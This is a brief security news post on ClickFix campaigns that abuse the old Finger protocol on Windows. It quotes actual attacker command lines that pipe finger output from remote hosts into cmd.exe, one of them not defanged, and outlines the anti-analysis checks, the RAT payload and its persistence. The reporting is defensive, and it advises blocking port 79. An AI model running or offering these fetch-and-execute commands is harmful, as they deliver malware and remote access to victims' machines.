Post

Decades-old ‘Finger’ protocol abused in ClickFix malware attacks

Posted
By ictsec.pl
1 min read

Threat actors are abusing the decades-old “finger” command to execute malicious commands on Windows devices, reviving a previously known LOLBIN technique. The Finger protocol, once commonly used for looking up user information on Unix and Linux systems, is now being leveraged in ClickFix attacks to retrieve and execute remote commands.

Last month, a researcher discovered a batch file employing the command finger root@finger.nateams[.]com to fetch commands from a remote server and execute them locally. While that specific host is no longer active, further investigation revealed similar campaigns utilizing the finger command. In one instance, a Reddit user reported falling victim to a ClickFix attack disguised as a Captcha verification, prompting them to execute a Windows command that initiated finger vke@finger.cloudmega[.]org, piping the output through cmd.exe. This triggered the download of a fake PDF containing a malicious Python package which then made a callback to the attacker’s server.

Another campaign utilizes finger Kove2@api.metrics-strange.com | cmd to execute similar commands. However, this variant includes a reconnaissance phase, actively searching for common malware analysis tools such as filemon, regmon, procexp, tcpview, Wireshark, and debuggers like OllyDbg. If any of these tools are detected, the script terminates, likely to evade analysis. If no such tools are found, it downloads a ZIP archive masquerading as a PDF, which instead of the Python malware, extracts the NetSupport Manager RAT package and configures a scheduled task to launch it upon user login, enabling remote access.

These attacks highlight the Finger protocol as a remote script delivery method. The retrieved commands create random paths, copy curl.exe, and use the renamed curl executable to download zipped archives. These archives, disguised as PDFs, contain malicious payloads which are then executed.

The best defense against this abuse is to block outgoing traffic to TCP port 79, the standard port for the Finger protocol. While these attacks currently appear to be conducted by a single threat actor, vigilance is crucial. Security professionals should monitor for unusual network traffic and educate users about the risks of executing commands from untrusted sources.

To read the complete article see: Bleeping Computer.

RESEARCH
FINGER PROTOCOL CLICKFIX MALWARE WINDOWS SECURITY MALICIOUS SOFTWARE CYBERSECURITY
This post is licensed under CC BY 4.0 by the author.